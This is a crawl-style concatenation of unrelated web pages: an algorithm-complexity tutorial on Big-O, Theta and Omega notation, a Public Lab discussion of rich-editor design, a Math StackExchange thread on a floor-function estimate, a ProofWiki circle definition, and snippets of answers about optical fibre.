the total running time is also constant, $\mathcal{O}(1)$, as long as the number of statements does not grow with the input size.
## If-Then-Else
For the if-then-else block, only one block gets executed, based on the condition. But the run time for the block may be different from other blocks in the if-then-else statement.
if (condition) then
{
block 1;
}
else
{
block2;
}
Therefore,
\begin{aligned}
Total \hspace{1mm}runtime = Max(time(block 1), time(block2));
\end{aligned}
For Example,
Total\hspace{1mm} runtime = Max(\mathcal{O}(1), \mathcal{O}(n))
Depending on the condition the total runtime of if-then-else block could be
\mathcal{O}(1) \hspace{1mm}or\hspace{1mm} \mathcal{O}(n)
## Loops
The loop runs N times for any given value of N. The statements inside the loop are also repeated N times.
for j = 1 to N do {
statements;
}
The loop runs N times and each statement inside the loop takes $\mathcal{O}(1)$. The total runtime is then given below.
\begin{aligned}
&Total \hspace{1mm}runtime = N * \mathcal{O}(1)\\
&= \mathcal{O}(N)
\end{aligned}
## Nested Loop
A nested loop is not much different from a single loop statement, except that now there are two loops and their running times get multiplied.
for i = 1 to N do
{
for j = 1 to M do
{
Statements;
}
}
Suppose the outer loop runs $N$ times and an inner loop has a complexity of $\mathcal{O}(M)$.
Total \hspace{1mm}Time\hspace{1mm} Complexity = \mathcal{O}(N * M)
Let us say that the inner also runs for N times, the total complexity is given by
= \mathcal{O}(N^2)
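A small Python sketch of the counting argument (not from the original article): the work done by the nested loop grows as N * M, and as $N^2$ when both bounds are N.
def nested_loop_steps(N, M):
    steps = 0
    for i in range(N):          # outer loop: N iterations
        for j in range(M):      # inner loop: M iterations per outer iteration
            steps += 1          # stands in for the O(1) statements
    return steps

print(nested_loop_steps(10, 20))   # 200 = 10 * 20
print(nested_loop_steps(30, 30))   # 900 = 30**2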
## Functions
Functions are blocks themselves and contain many other statements. The total time of a function depends on these statements.
Suppose a function $f(N)$ takes $\mathcal{O}(1)$ and there is another function $g(N)$ that has a loop. Then,
Total \hspace{1mm}Time\hspace{1mm} Complexity \hspace{1mm}of \hspace{1mm}g(N) = \mathcal{O}(N)
because of the loop.
## Statements with Function
A loop statement can be inside of a function, but it is also possible that a function is inside of a loop.
for j=1 to N do {
g(N);
}
Since, we already know that the running time of the function $g(N)$ is $\mathcal{O}(N)$.
\begin{aligned}
&Total \hspace{1mm} Complexity = N * \mathcal{O}(N)\\
&= \mathcal{O}(N^2)
\end{aligned}
This is because the loop runs N times and each iteration calls the function, which itself does $\mathcal{O}(N)$ work.
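As a small illustration in Python (a sketch, not from the original article): calling a function that does $\mathcal{O}(N)$ work inside a loop that runs $N$ times gives $\mathcal{O}(N^2)$ work overall.
def g(N):
    # g contains a loop, so one call does N units of work: O(N)
    return sum(1 for _ in range(N))

def loop_calling_g(N):
    total = 0
    for _ in range(N):      # the loop repeats the O(N) function N times
        total += g(N)
    return total

print(loop_calling_g(100))   # 10000 = 100**2 units of work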
# Algorithms Order Of Growth
The Big O notation, the theta notation and the omega notation are asymptotic notations to measure the order of growth of algorithms when the magnitude of inputs increases.
In the previous article – performance analysis – you learned that an algorithm executes in steps and each step takes a "constant time". You can count the number of steps and then arrive at the total computing time required for the algorithm.
## Background
You also learned that complexity affects the performance of the algorithm. These complexities are space complexity and time complexity.
Complexity describes how an algorithm's resource usage scales as the input grows, whereas performance accounts for the actual resources (e.g. disk, memory, CPU time) used during execution. Complexity affects performance; performance does not change complexity.
If you leave out fixed space (simple variables, constants, etc.) and fixed time (such as compile time), the complexity depends on the instance characteristics of the algorithm (operations or steps), such as the input size or magnitude.
## What is a suitable method to analyze the algorithm?
Here we consider the instance characteristics, i.e. the number of operations performed by an algorithm to solve a problem of size n.
You want to analyze three cases.
1. Worst Case Performance
2. Average Case Performance
3. Best Case Performance
Worst Case Performance: given an instance of a problem with the maximum number of operations what is the time required for the algorithm to solve the problem. This is the worst-case analysis for the algorithm.
Average Case Performance: the instance of a problem has the average number of operations that the algorithm needs to solve. The time to complete such operations is the average case analysis of the algorithm.
Best Case Performance: the problem is already in a solved state or needs fewer steps to solve.
While analyzing an algorithm you should be more concerned about the worst case than average or best case. It is better to compare two algorithms based on the worst-case scenario.
## Notations for Complexity
The number of operations for an algorithm when counted will give a function.
For example
an^2+ bn + c
This expression represents an exact step count for an algorithm. You do not need an exact count, because when we analyze the algorithm for the worst case we consider only the highest-order term and drop the lower-order terms, which are insignificant when the input is huge.
therefore,
\begin{aligned}
&an^2 + bn + c\\\\
&becomes\\\\
&O(n^2)
\end{aligned}
This symbol is known as the Landau symbol or $Big \hspace{3px} O$ notation, named after the German mathematician Edmund Landau. It tells us the fastest-growing term in the function, called the order or rate of growth. That is why the lower-order terms become insignificant and are dropped.
Asymptotic notations such as $Big \hspace{3px} O$ are used to describe the running time of algorithms. There are other notations to describe the running time as well.
Suppose $T(n)$ is the function of the algorithm for input size n,
then running time is given as
T(n) = O(n^2)
## Formal Definition of Big O
Let $f(n)$ and $g(n)$ be two functions; then $\mathcal{O}(g(n))$ is an asymptotic upper bound to $f(n)$ for a problem of size n.
For a given function $f(n)$, the function $\mathcal{O}(g(n))$ is a set of functions
\begin{aligned}
&O(g(n)) = f(n) : there \hspace{1mm}exist \hspace{1mm} positive \hspace{1mm}constants \\ \\
&\hspace{1mm}c \hspace{1mm}and \hspace{1mm} n_0 \hspace{1mm} such \hspace{1mm}that \\\\
&0 \leq f(n) \leq cg(n), for \hspace{1mm} all \{n \geq n_0\}\end{aligned}
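To make the definition concrete, here is a small worked example (not from the original article), using the earlier step-count expression and assuming positive coefficients:
\begin{aligned}
&f(n) = an^2 + bn + c \leq an^2 + bn^2 + cn^2 = (a+b+c)n^2 \hspace{1mm} for \hspace{1mm} all \hspace{1mm} n \geq 1\\ \\
&so \hspace{1mm} the \hspace{1mm} definition \hspace{1mm} is \hspace{1mm} satisfied \hspace{1mm} with \hspace{1mm} the \hspace{1mm} constant \hspace{1mm} a+b+c \hspace{1mm} and \hspace{1mm} n_0 = 1, \hspace{1mm} giving \hspace{1mm} f(n) = \mathcal{O}(n^2)
\end{aligned}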
The graph of the function is given by the following.
## Formal Definition of Theta-Notation
Let $f(n)$ and $g(n)$ be two functions. Then $\Theta(g(n))$ gives both an asymptotic upper bound and an asymptotic lower bound; it means that the function $f(n)$ is "sandwiched" between $c_1 g(n)$ and $c_2 g(n)$
\begin{aligned}
&\theta (g(n)) = f(n) \hspace{1mm} such \hspace{1mm} that \\\\
&there \hspace{1mm} exist \hspace{1mm} positive\hspace{1mm} constants\hspace{1mm} c_1,c_2 \hspace{1mm} and\hspace{1mm} n_0 \hspace{1mm} such\hspace{1mm} that \\\\
&0 \leq c_1g(n) \leq f(n)\leq c_2g(n) for \hspace{1mm} all \{n \geq n_0\}
\end{aligned}
The graph of Theta notation is given below.
## Formal Definition of Omega-Notation
Let $f(n)$ and $g(n)$ be two functions. Then $\Omega(g(n))$ gives an asymptotic lower bound; it means that the function $f(n)$ is at least $cg(n)$ for all sufficiently large $n$.
\begin{aligned}
&\Omega(g(n)) = f(n) :there \hspace{1mm}exists \hspace{1mm}positive \hspace{1mm}constants \hspace{1mm}c and \hspace{1mm} n_0 \hspace{1mm}such \hspace{1mm}that \\ \\
&0 \leq c g(n) \leq f(n) \hspace{1mm}for \hspace{1mm} all \{n \geq n_0\}
\end{aligned}
The graph of Omega notation is given below.
# Algorithms Complexities
Performance analysis of an algorithm is done to understand how efficient that algorithm is compared to another algorithm that solves the same computational problem. Choosing efficient algorithms means computer programmers can write better and efficient programs.
The main computer resources are memory and CPU time, and performance analysis revolves around these two resources. Two ways to evaluate an algorithm are listed below.
1. Space requirement
2. Computation time
### Space Complexity
The space requirement is the memory needed by the algorithm to solve a computational problem to completion. The program source code has many types of variables with different memory requirements, so you can divide the space requirement into two parts.
Fixed Variables
The fixed part of the program consists of the instructions, simple variables and constants that do not need much memory and do not change during execution. They are independent of the characteristics of any particular instance of the computational problem.
Dynamic Variables
Variables whose size depends on the input, pointers that refer to other variables dynamically, and stack space for recursion are some examples. This type of memory requirement changes with the instance of the problem and depends on the instance characteristics. It is given by the following equation.
\begin{aligned}&S(P) = c + SP \\
&where \\
&S(P) \hspace{1mm} is \hspace{1mm}space\hspace{1mm} requirement\\
&c \hspace{1mm}is\hspace{1mm} a \hspace{1mm}constant \\
&SP\hspace{1mm} is\hspace{1mm} the \hspace{1mm}instance \hspace{1mm}characteristics
\end{aligned}
Instance characteristics cannot be determined until an instance of the problem is actually run; they correspond to the dynamic memory space. The input size usually determines the instance of a computational problem.
### Time Complexity
The time complexity is the amount of time required to run the program to completion. It is given by the following.
\begin{aligned}&T(P) \hspace{1mm} = compile \hspace{1mm}time\hspace{1mm} +\hspace{1mm} run-time\\
&P\hspace{1mm} is \hspace{1mm}the \hspace{1mm}program.\\
&T(P) \hspace{1mm}is \hspace{1mm}the \hspace{1mm}time\hspace{1mm} complexity \hspace{1mm}of \hspace{1mm}program.\end{aligned}
Program Execution in Steps
The computer executes a program in steps and each step has a time cost associated with it. This means that a step can be done in a finite amount of time. See the table below.
You can count the number of steps an algorithm performed using this technique.
For example, consider the following example.
Note:-
\begin{aligned}&
S/e = steps \hspace{1mm}per \hspace{1mm} execution\hspace{1mm} of\hspace{1mm} a \hspace{1mm}statement.\\
&Frequency = The\hspace{1mm} number\hspace{1mm} of\hspace{1mm} times \hspace{1mm}a \hspace{1mm}statement \hspace{1mm}is \hspace{1mm}executed.
\end{aligned}
The result of the step count is $2n + 3$, which is a linear function. Performance analysis begins by counting steps, but the count itself is not the goal. The goal is to find a function that describes the algorithm in terms of its input size. This function tells you how the algorithm will perform for different input sizes and magnitudes.
# Algorithms Pseudo Code
In this article, you will learn how to represent an algorithm using pseudo code and the elements of pseudo code. Learning a programming language is not necessary to understand pseudo code, but knowing a programming language like C, Pascal, etc. helps you understand pseudo code better.
## Algorithms Components
An algorithm has two parts – the heading and the body. See the table below for more information.
### Example:
Algorithm Find_Max( A[n])
{
// A[n] is the list of unsorted numbers from which
// we need to find Max value.
max := A[1];
for i := 2 to n do
if A[i] > max then
{
max := A[i];
}
return max;
}
The above is a sample algorithm to find the max value in a list of numbers. The algorithm is written in pseudo code and contains a lot of elements with their own notations.
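For comparison, here is the same algorithm as runnable Python (a direct translation of the pseudo code above; Python lists are 0-indexed and the list is assumed to be non-empty):
def find_max(a):
    # a is the list of unsorted numbers from which we need to find the max value
    max_value = a[0]
    for i in range(1, len(a)):
        if a[i] > max_value:
            max_value = a[i]
    return max_value

print(find_max([3, 7, 2, 9, 4]))   # 9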
## Notations
See the table below to understand each notation because you need them for writing algorithms.
# Algorithms
A computer program is a set of clear instructions in a programming language that solves some problem.
You can write the program in different programming languages, but the solution to the problem remains the same irrespective of the language. Therefore, an algorithm is a language-independent solution to a computer-based problem.
This tutorial is meant for beginners who are new to algorithms. Some experience with a programming language is sufficient to start learning algorithms, but here is some more information about the prerequisites.
• You must be familiar with basic mathematical concepts such as exponents, set theory, mathematical induction, trees, graphs, relations, limits and so on.
• Some knowledge of programming is recommended such as C/C++ or Java Programming.
You can visit our programming tutorials to learn programming concepts to get comfortable with algorithms.
## Algorithms Tutorial Topics
Here is a list of topics for algorithms. Read from top (easy) to bottom (difficult).
## Recommended Books
Beginners often find algorithms difficult to learn. Algorithms are purely logical and need clear thinking. Once you understand them, you must be able to categorize algorithms and recognize which one is suitable for your programming projects.
Apart from what you learn in this tutorial, we recommend some books in this section which will help you understand Algorithms in best possible way. We have picked the best books for you.
# Algorithm Introduction
The computer program is a set of basic instructions to computer hardware. The computer hardware executes the instruction to carry out some tasks. The computer program is written using a blueprint called an algorithm. Each step in an algorithm has a clear meaning and performs a specific task.
An algorithm is any well-defined computational procedure that transforms one or more input values into one or more output values. Algorithms solve computational problems in a step-by-step manner.
For example, given a set of unsorted numbers as input, a sorting algorithm can sort the numbers in ascending or descending order as output.
\begin{aligned}
&Unsorted \hspace{1mm}set\\
&\{ 2, 3, 5, 1, 8, 4, 7, 6\} \\ \\
&Sorted \hspace{1mm}list \hspace{1mm}solved \hspace{1mm}by \hspace{1mm}sorting \hspace{1mm}algorithm\\
&\{1, 2, 3, 4, 5, 6, 7, 8 \}
\end{aligned}
### Characteristics of an Algorithm
Algorithms have some common characteristics that separate them from computer programs. A computer program implements the algorithm to solve a computer-based problem, but the reverse is not true.
• Inputs
• Output
• Definiteness and Unambiguous
• Finiteness
• Effectiveness
Input
An algorithm needs zero or more input values to compute the outputs. The size of the input values can be different for each instance of a problem solved by the algorithm.
Certain algorithms require that you place constraints on the input values. For example, an algorithm may need only positive integers values, the negative values are not allowed.
Output
An algorithm processes the inputs and produces the desired output. The correct algorithm will always produce correct outputs for a computation problem.
Sometimes the output is a single value and sometimes it is an array of quantities.
Definiteness and Unambiguous
The algorithm must perform definite operations or tasks that result in intermediate or final output. All procedures must contain unambiguous operations. If not, the algorithm may fail to terminate or may produce the wrong output, violating the finiteness characteristic or becoming an incorrect algorithm.
Finiteness
Finiteness means "having limits": every algorithm must end after a finite number of steps. This is not a license to take an arbitrarily large number of steps to solve a problem, because you would not call such an algorithm efficient.
An algorithm that terminates after reasonably finite steps maintains the finiteness characteristic.
Effectiveness
The algorithm must perform basic operations that can be done using a pen or pencil on a piece of paper. This is called the effectiveness of the algorithm.
### How to Represent an Algorithm?
Representing algorithm depends on the context. When you are writing a new algorithm then writing steps in plain English is suitable. The best way to represent an algorithm when writing a program is using a flowchart.
Three ways to represent an algorithm are
1. Language ( e.g English)
2. Flowcharts
3. Pseudo Code (e.g C, C++)
Algorithms in this tutorial are written in pseudo codes.The pseudo codes are inspired by programming languages like C, but they are not executable codes. Instead a mere representation of algorithm. | 2023-02-04 03:20:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 30, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6165331602096558, "perplexity": 1125.2620505549112}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500080.82/warc/CC-MAIN-20230204012622-20230204042622-00580.warc.gz"} |
https://i.publiclab.org/notes/warren/04-29-2016/early-design-ideas-for-the-rich-editor-project | # Early design ideas for the Rich Editor project
by warren | 29 Apr 18:43
There've been LOTS of great ideas posted, both in response to my recent ask for input on the new Rich Editor project, and in response to @liz's post on peer review -- that have relevance to the ongoing design of the new Rich Editor.
There's really too much to tackle all at once, but I've been working on sketching a number of ideas for designs and/or features that I wanted to put out there, especially in advance of Monday's OpenHour on Public Lab's research culture.
Here's the big sketch, which covers a lot of different ideas:
Keep in mind, as always this early in the design process, that this is more about layout, flow, and features, than about graphic design or typography specifics. Let me walk through a few of these
## Step-wise authoring
As we add new features and make the Editor more powerful, we add complexity. We can use design to "stage" this complexity, so that more advanced features are available, but aren't cluttering the display for newer authors who might be overwhelmed.
Organizing the Editor by clearly-separated steps helps situate each feature in the overall process, though they take more space to display in steps. But steps can also have helpful guidance and tips that doesn't all run together into a big block of text the way it does in our current editor.
## "Type" selector
There are already a few types of post -- events and questions vs. basic research notes -- and we've talked about making one specific to the blog, or for other uses. A type selector could display a different "flavor" of the Editor for different purposes, and could also be used to categorize posts a bit, if we wanted: "exploratory" posts vs. "data analysis" or "narrative" ones, though we'd have to figure out how to clearly refer to these different types.
## A text area that grows
The text area that you type the body of your note into will be a WYSIWYG (what you see is what you get) "rich text" editor, of course. But one improvement over the current one is that it could scale vertically to accommodate your text. As you type, there's more space in the left column, so we could display additional tips, perhaps relevant to someone authoring a longer piece -- including encouraging them to break it up into a series of posts (we can explore better ways to present a series of posts, too).
## Inviting others into your work
One big priority is to provide some tools for authors to build collaborations -- from asking others for help, to proposing that others replicate work, to soliciting review of a draft.
There are suggestions of this throughout the mockup, but one big one is the "I'd like feedback/help on X" selector next to the Publish button. The options in it are just a few suggestions -- chime in if you have your own -- but the idea would be to specifically ask for interaction from your readers.
## Miscellaneous
The mockup also includes lots of small feature ideas -- note the suggested placement of auto-saved "drafts," the "suggested tags" and the "recent tags" drawn from your own recent posts (or tags you've followed, perhaps).
## Feedback welcome
Of course, this doesn't begin to cover all the various needs and use cases the Editor will have to address, but it's an early exercise to see how it might integrate into an overall design.
I'm curious -- what do people think of this basic layout:
• in terms of approachability
• is there too much information? Too little?
• how it would read to newcomers vs. long-time contributors?
Thanks in advance for your thoughts and suggestions as this design process moves forward!
Looks like a good starting point. For the moment, I'd first suggest incorporating some form of sub-topic list for the 'Body/Content' section which might have a different set for each general category. By this I mean that the selector for note/question/event/etc would each prompt an appropriate set of sub-sections in the body to be covered. A research note would require a different set than an announcement of an event. I acknowledge the existing Note format includes a few suggested questions to answer, but at least in the case of research, that list is insufficient and authors appear to need more guidance. Other types of submissions can have parallel missing material.
Thanks for the input, Dave.
I had another idea -- we've talked about asking for things after someone presses publish (like, for example, tagging) to reduce the upfront requirements and present a simpler form.
Some of these could go at the head or foot of the note itself, once published. Like "now, invite others to reproduce your work -- be sure youve provided a materials list and instructions" or "add this to a series of recent research" or "mark this as an open challenge" or whatever.
Yes, procedurally (for the form) reminders are generally easy. However, I'd suggest (or remind ;-) ) that such action items would mandate that each have some web functionality to back it up. For instance, 'add to series of research' would 1) still require the submit process and 2) there would have to be some form of 'note series linking' in existence.
Help with tagging is fine, but it is frequently either ignored or abused rather badly by some so I'd suggest 1) the tagging process needs to be redesigned and 2) if tagging is to be used at all, existing note tags need to be cleaned up. I realize this is a bit drastic, but maybe #2 could be initially automated a bit -- do an automated search of all existing notes and compare words used in the body of the note to words in the tags and remove all but the top 5 matching tags. For notes with no tags, the same process could add 3 tags based on the same word predominance within the body text.
I think being able to explicitly save and return to drafts, invite others to collaborate are my priority features here. What do you think about saving a "shared" draft such that more than one person can work on drafting/editing a note? Right now multiple authors can be tagged but only one can edit. Can the invitation to share a draft include an invitation to edit?
The Stepwise editing that gives a 'template' for a post is helpful now, I like that it will be expanded to have event/question framings too.
Is this a question? Click here to post it to the Questions page.
We have two distinct ideas of "draft" which I want to try to reconcile -- one is to simply publish a post normally, but it'd be marked "draft" (kind of like a preprint preview on arXiv or something):
• it'd show up in the normal feed (we could offer option to filter)
• it might specifically list input requested
Another is one which is not published, or not visible to anyone except those allowed by original author.
• it might be more complex since we might have to include notifications, tighter access restrictions
In either case, we could make the final publication date distinct from the draft publication date. I like the model of A better, but curious it'd meet the needs of the B scenario too, or if they're really quite distinct?
In any case, we can add multiple author access using the with:coauthor tag.
Re: edit history, the faster way to complete it would be to store drafts in the browser localStorage, but this would mean you could not begin editing on a phone, then pick up on a laptop (a use case I'd really like, for adding images from my phone, but authoring on my laptop). So I have to consider whether a server-side edit history is possible (and worthwhile) in our timeframe. Another solution to this would be to have a "recent images" selector so it doesn't matter if you're editing the same draft, you can upload from your phone no matter what, and see images uploaded from any source when placing them.
Is this a question? Click here to post it to the Questions page.
At the Open Hour today, we brainstormed allowing users to flag a post with "the information in this post has been superceded by a newer research note" and submit a link to the newer note.
In this way historical info can be preserved, new users can find up to date procedures, and new users and other editors can help in the co-creation of organization :D
Jeff, I'd like to suggest that 'notes' have generally taken the form of either 1) "completed" sets of information or 2) focused topics of "open-ended" inquiry. One might find another basic form as well; however, all could likely be served by the same basic tools.
In #1, the work has largely been completed so the submission is mostly a process of careful documentation; the 'draft' is the pre-publish stage and the final doc requires review. In #2, the work starts by publishing the 'draft' which forms the kernel of an indeterminate project and is never classified as reviewed. A type #2 document might, but is not required to, end in a separate type #1 document being submitted. Type #2 remains a 'draft'; just one which has evolved. Either type could be singular or collaborative but #1's tend to be singular and #2's tend to be collaborative.
The above is describing the structure of each 'root' PLab 'field of interest'; which should be pre-defined because there's a small, finite number of them -- eg. Mapping, IR, Water, Air, Spectrometry, Oil, etc. This strongly suggests that while one PLab page might show all submitted notes (it's just one cross-sectional view of all notes - latest first for easy review), that is only a programmatic view of the site which contains separate categories for each area of interest. Selecting a root topic therefore filters out most of the obviously un-related material which simplifies topic search. Yes, a programmatic view option of search could provide related material.
Hi, all - I'll probably post another set of sketches on this soon, but a few followup ideas:
### Research note sequences
I've mentioned this before, but the idea would be that you could mark your post as a certain portion of the research, and the published note page would prompt you to (and/or others) to continue the sequence of posts with the "next step" which could be determined from the step you marked this one with.
### Connect to other work
A small search form to search for and link to other work this relates to, to better interlink posts.
### Charts
A way to input some data in fences (like code) but that would form a graph, maybe like this:
chart | 2022-05-27 16:42:20 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.35136333107948303, "perplexity": 1669.3441422230303}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662658761.95/warc/CC-MAIN-20220527142854-20220527172854-00415.warc.gz"} |
https://math.stackexchange.com/questions/1292626/confusion-with-o-function | # Confusion with $O$ function
I read this identity in lecture notes and need help understanding the $O$ function
$$\sum_{1\leq d\leq x}\mu(d)\cdot \frac{1}{2}\left\lfloor\frac xd\right\rfloor\left(\left\lfloor\frac xd\right\rfloor+1\right)=\sum_{1\leq d\leq x}\mu(d)\left(\frac{x^2}{2d^2}+O(x/d)\right)$$
Attempt: This implies
$$\frac{1}{2}\left\lfloor\frac xd\right\rfloor\left(\left\lfloor\frac xd\right\rfloor+1\right)=\frac{x^2}{2d^2}+O(x/d)$$
From the definition of $\left\lfloor\theta\right\rfloor$ being the greatest integer not exceeding $\theta$
I can see that $\left\lfloor\frac xd\right\rfloor=x/d+O(1)$,
But substituting this in cannot lead to an expression with $O(x/d)$, where does this come from?
How do I derive this expression
• Um, what? What is $c$? And $O$ is used for estimation, but what you've stated is an exact equality. You'd pretty much never us $O$ in a proof of an equality, unless the equality included limits. – Thomas Andrews May 21 '15 at 12:34
• Corrected the 'c' part – Sam Houston May 21 '15 at 12:38
• Also, the limits are set by the summation sign – Sam Houston May 21 '15 at 12:39
Let's realize what you really want is:
$$\lfloor y\rfloor (\lfloor y\rfloor +1)=y^2+O(y)$$
Let $f(y)=y(y+1)$. Then $f(y)-f(\lfloor y\rfloor) = f'(z) (y-\lfloor y\rfloor)$ for some $z\in [\lfloor y\rfloor, y]\subseteq (y-1,y]$.
But $f'(z)=2z+1$ so $f'(z)= O(y)$ when $z\in (y-1,y]$, and $0\leq y-\lfloor y\rfloor <1$, so $f(y)-f(\lfloor y\rfloor) = O(y)$ and $f(y)=y^2+O(y)$.
So $$f(\lfloor y\rfloor)=f(y)-(f(y)-f(\lfloor y\rfloor)) = y^2 + O(y) - O(y)= y^2+O(y).$$
$$\frac{1}{2}[x/d]([x/d]+1)=\frac12\left(\frac xd+O(1)+1\right)\left(\frac xd+O(1)\right)=\frac{x^2}{2d^2}+\frac xdO(1)+O'(1)\\ =\frac{x^2}{2d^2}+O''\left(\frac xd\right).$$
• Could you elaborate on the last equality please, still confused by that, what is the realationship betweeen $O(1)$ and $O(x/d)$ – Sam Houston May 21 '15 at 12:42
• Do you know the big-$O$ notation ? – Yves Daoust May 21 '15 at 12:43
• I am working on becoming more familiar with it, not clear on it yet – Sam Houston May 21 '15 at 12:47 | 2019-10-17 05:26:13 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9057852029800415, "perplexity": 582.5121461346546}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986672723.50/warc/CC-MAIN-20191017045957-20191017073457-00478.warc.gz"} |
https://proofwiki.org/wiki/Definition:Conic_Section/Reduced_Form/Circle | # Definition:Conic Section/Reduced Form/Circle
Let $K$ be a circle embedded in a cartesian coordinate plane.
$K$ is in reduced form if and only if its center is located at the origin. | 2020-01-28 06:27:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7690779566764832, "perplexity": 272.8398639407864}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251776516.99/warc/CC-MAIN-20200128060946-20200128090946-00528.warc.gz"} |
https://electronics.stackexchange.com/tags/optical-fibre/hot | # Tag Info
60
It seems like you're referring specifically to http://www.nature.com/nphoton/journal/v8/n11/full/nphoton.2014.243.html . It can be read here: https://www.researchgate.net/publication/269099858_Ultra-high-density_spatial_division_multiplexing_with_a_few-mode_multicore_fibre . In this case, it's slightly more complicated than "an optical signal". The link ...
51
This is where the measurement scientist has to go into full sceptical and investigative mode. First thing. Fibre, as a passive material, is lossy. It absorbs power. Therefore the power arriving at the end of a length of fibre will be less than was launched. Period. No arguments. We don't do over-unity here. So what causes your observations? Single mode, ...
43
Rather than worrying about a research paper that's pushing things to the limit first start by understanding the stuff sitting in front of you. How does an SATA 3 hard drive in a home computer put 6 Gbits/s down a serial link? The main processor isn't 6 GHz and the one in the hard drive certainly isn't so by your logic it shouldn't be possible. The answer ...
26
The other answers have suggested some ways your experiment might have gone wrong. Let me tell you how to do a fiber attenuation measurement correctly. The standard technique is called a cut-back measurement. This means you set up your source feeding a long piece of fiber (say, 10 m). You then direct the output of that fiber into a large-area detector (...
17
In addition to the answer of TimB, there is another advantage of this optical communication. With RCA, the two networks connected have to be referenced to each other. In the case of optical, there is galvanic isolation between the two. As a result, there might be less issues with ground loops, networks can remain isolated, etc. It also means that the ...
16
Neil_UK's answer is pretty much spot on, i.e. your measurements are broken. :-( The first and most obvious problem is in the lengths chosen, 1m and 30m: These are both well within the edge effect ranges, i.e. the quality of the fiber end connections will dominate any actual attenuation loss. In particular, good quality single mode fiber at 1300 nm can come ...
15
Ignoring the details of the specific transmission in question (which @alex.forencich has already discussed in considerable detail), it seems like it's probably useful to consider the more general case. Although this particular transmission hit 255 Tbps through the fiber, extremely fast fiber links are already in regular use. I'm not sure exactly how many ...
15
I want to ask, within the scope of digital audio transmission, is there any observable or measurable difference between the two cables? Actually, yes. Isolation: Optical fiber isn't conductive, so it solves ground loops and hum/buzz issues and is insensitive to RF interference. Coax can also be isolated with a transformer, however this adds to the ...
14
You are right, this is the case but fiber optics can still have problems that can be perceived as noise that lead to incorrect data: Intersymbol interference: This is a kind of noise because the previous symbol that was sent will interfere with the actual symbol that is being sent. Thus the previous symbol will act as noise. Well known techniques to help ...
8
First, when you talk about the "speed" of a signal in optical fiber, that's ambiguous. You should be clear about whether you're interested in the latency (the time it takes a signal to travel from one end of the fiber to the other) or the bit rate. In this case, it seems most likely you're interested in the latency, or propagation delay. In my opinion if ...
6
Your photo appears to be SFP/SFP+ transceivers. SFP isn't really a connector type; it is a transceiver standard. The actual connector (on the switch side) is a board edge connector, the other side can be a wide variety of connectors. If it's the actual fibre connector you're talking about, probably LC connector, which is the optical connector used in just ...
6
One-way Ethernet cables won't work with Gigabit network equipment and later, because without a return path the autonegotiation sequence will never complete. You'll see a "Network cable unplugged" or an equivalent message on both devices if you try to use such a cable. Older Ethernet devices won't work with simple one-way cables either, but can be fooled to ...
5
